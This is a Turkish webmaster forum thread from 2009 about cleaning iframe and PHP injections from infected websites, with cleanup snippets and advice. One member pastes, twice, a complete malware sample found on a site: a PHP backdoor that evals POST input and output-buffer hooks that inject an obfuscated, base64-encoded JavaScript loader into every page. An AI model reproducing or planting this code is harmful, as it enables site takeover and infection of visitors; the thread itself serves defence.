yazma izni olması lazım dosyalarda
kodların üstüne
ini_set('error_reporting',E_ALL);
yazarsan hata olarak ekrana permisson denied diye uyarı verecektir yazma izni veririp dosyaları yazdırırsın sonra tekrar eski chmodlarına alırsın
Sitenize Bulaşan iframe virüsünün temizlenmesi için php script
73
●6.953
- 16-05-2009, 15:05:20
Üyeliği durdurulduphp dosyanızın ilk satırında base_64 ile şifrelenmiş ve bilmediğiniz bir kod eklenmiş ise buda php virüsü oluyor bunu temzilemek için scriptte şöyle bir değişiklik yapabilirsiniz
######################
$oku = file_get_contents($dizin.$dosya);
$desen = ‘|< (i?)frame .+?>|i’;
$yaz = preg_replace($desen,”,$oku);
####################
yerine
#################
$oku = file($dizin.$dosya);
array_shift($oku);
$yaz = implode(”\n”,$oku);
################
şeklinde değiştirilip ilk satır silinebilir
eğer js lerde son satırda ise dosya uzantısı tespit edilip
index.php ise array_shift , xxx.js ise array_pop ile son satır silinip tekrar kayıt edilebilir…. - 16-05-2009, 22:38:47 Üyeliği durduruldubu arada benzer şey başıma gelip illallah çektigim için
grep -lir "iframe" *
gibide konsoldan komut calistirip alt klasörleride aratmak üzere ilgili dosyaları buldurabiliyorsunuz - 16-05-2009, 22:49:29 Üyeliği durdurulduşahsen kendi yaşamış birisi olarak aynen katılıyorum.kuaza adlı üyeden alıntı: mesajı görüntülene kadar silseniz de yine olacak
cunku virus bilgisayarinizda ve ftp programinizi kullanarak tekrar kodlari yerlestirebilir.. once bilgisayarinizi temizleyin, sonra arkadasin verdigi dosyayi kullanin
1. seçenek konsoldan baglanin ssh ile. direk ssh dan temizlediginiz zaman sunucu kısmında rahat edersiniz.
kendi bilgisayarınıza gelince Kaspersky buluyor virüsü. en temizi zaten bi format (aslinda geri ubuntu kullanmaya dönmek gerek) ondan sorna ilk kurduğunuz şey virüs program + update edince zaten rahatlıyorsunuz
bir örnek olarak kuru kuru iframe de atmiyor amcalar da virüsü geliştiriyorlar.
temizlemeyi unuttuğum bir siteden şöyle bir kod çıktı şahsen ohaaa oldum
<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbigpe3ZhciB4VVE9JyUnO3ZhciB4MnpCSj0oJ3Zhci0yMGEtM2QtMjJTYy03Mi02OS03MHRFbi02N2luLTY1LTIyLTJjYi0zZC0yMlYtNjVyc2lvLTZlKCkrLTIyLTJjLTZhLTNkLTIyLTIyLTJjdS0zZG5hdi02OWdhLTc0LTZmci0yZS03NXNlci00MWctNjVudC0zYmlmKCh1LTJlaW4tNjRleE9mKC0yMldpLTZlLTIyKS0zZTApLTI2LTI2KHUtMmVpLTZlZGV4Ty02NigtMjItNGVULTIwNi0yMiktM2MwKS0yNi0yNihkb2N1LTZkZS02ZXQtMmVjb29raWUtMmVpbmRleC00ZmYtMjgtMjJtLTY5LTY1LTZiLTNkMS0yMiktM2MwKS0yNi0yNih0LTc5LTcwZS02ZmYoenJ2enQtNzMpLTIxLTNkdHlwLTY1LTZmZigtMjItNDEtMjIpKSktN2ItN2EtNzJ2LTdhdHMtM2QtMjJBLTIyLTNiZXZhbC0yOC0yMmlmKHctNjluZG8tNzctMmUtMjIrLTYxLTJiLTIyKWotM2RqLTJiLTIyK2ErLTIyTWFqby03Mi0yMistNjIrYS0yYi0yMk1pLTZlby03Mi0yMistNjIrYSstMjJCLTc1aWxkLTIyK2IrLTIyai0zYi0yMiktM2JkLTZmYy03NS02ZGVuLTc0LTJldy03MmktNzRlKC0yMi0zYy03M2MtNzItNjlwdC0yMHNyYy0zZC0yZi0yZmd1bWJsYXItMmVjbi0yZi03MnMtNzMtMmYtM2YtNjlkLTNkLTIyK2otMmItMjItM2UtM2MtNWMtMmZzYy03MmktNzB0LTNlLTIyLTI5LTNiLTdkJykucmVwbGFjZSgvLS9nLHhVUSk7ZXZhbCh1bmVzY2FwZSh4MnpCSikpfSkoKTsKIC0tPjwvc2NyaXB0Pg=='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><şahsen yazanı hayvan zekasından dolayı taktir ettim - 16-05-2009, 23:26:25 Üyeliği durdurulduo kodun acilimini yapabilecek varmi ??? cok ilginc bir seye benziyor..sdemirkeser adlı üyeden alıntı: mesajı görüntüleşahsen kendi yaşamış birisi olarak aynen katılıyorum.
1. seçenek konsoldan baglanin ssh ile. direk ssh dan temizlediginiz zaman sunucu kısmında rahat edersiniz.
kendi bilgisayarınıza gelince Kaspersky buluyor virüsü. en temizi zaten bi format (aslinda geri ubuntu kullanmaya dönmek gerek) ondan sorna ilk kurduğunuz şey virüs program + update edince zaten rahatlıyorsunuz
bir örnek olarak kuru kuru iframe de atmiyor amcalar da virüsü geliştiriyorlar.
temizlemeyi unuttuğum bir siteden şöyle bir kod çıktı şahsen ohaaa oldum
<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbigpe3ZhciB4VVE9JyUnO3ZhciB4MnpCSj0oJ3Zhci0yMGEtM2QtMjJTYy03Mi02OS03MHRFbi02N2luLTY1LTIyLTJjYi0zZC0yMlYtNjVyc2lvLTZlKCkrLTIyLTJjLTZhLTNkLTIyLTIyLTJjdS0zZG5hdi02OWdhLTc0LTZmci0yZS03NXNlci00MWctNjVudC0zYmlmKCh1LTJlaW4tNjRleE9mKC0yMldpLTZlLTIyKS0zZTApLTI2LTI2KHUtMmVpLTZlZGV4Ty02NigtMjItNGVULTIwNi0yMiktM2MwKS0yNi0yNihkb2N1LTZkZS02ZXQtMmVjb29raWUtMmVpbmRleC00ZmYtMjgtMjJtLTY5LTY1LTZiLTNkMS0yMiktM2MwKS0yNi0yNih0LTc5LTcwZS02ZmYoenJ2enQtNzMpLTIxLTNkdHlwLTY1LTZmZigtMjItNDEtMjIpKSktN2ItN2EtNzJ2LTdhdHMtM2QtMjJBLTIyLTNiZXZhbC0yOC0yMmlmKHctNjluZG8tNzctMmUtMjIrLTYxLTJiLTIyKWotM2RqLTJiLTIyK2ErLTIyTWFqby03Mi0yMistNjIrYS0yYi0yMk1pLTZlby03Mi0yMistNjIrYSstMjJCLTc1aWxkLTIyK2IrLTIyai0zYi0yMiktM2JkLTZmYy03NS02ZGVuLTc0LTJldy03MmktNzRlKC0yMi0zYy03M2MtNzItNjlwdC0yMHNyYy0zZC0yZi0yZmd1bWJsYXItMmVjbi0yZi03MnMtNzMtMmYtM2YtNjlkLTNkLTIyK2otMmItMjItM2UtM2MtNWMtMmZzYy03MmktNzB0LTNlLTIyLTI5LTNiLTdkJykucmVwbGFjZSgvLS9nLHhVUSk7ZXZhbCh1bmVzY2FwZSh4MnpCSikpfSkoKTsKIC0tPjwvc2NyaXB0Pg=='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><şahsen yazanı hayvan zekasından dolayı taktir ettim - 16-05-2009, 23:45:15 Üyeliği durdurulduvalla açılımına çok kasmadimda mealen obstart ile veriyi alip body kısmına kendi javascript fonksiyonlarini ekliyor. yalnız zekaya haryan oldumkuaza adlı üyeden alıntı: mesajı görüntüle
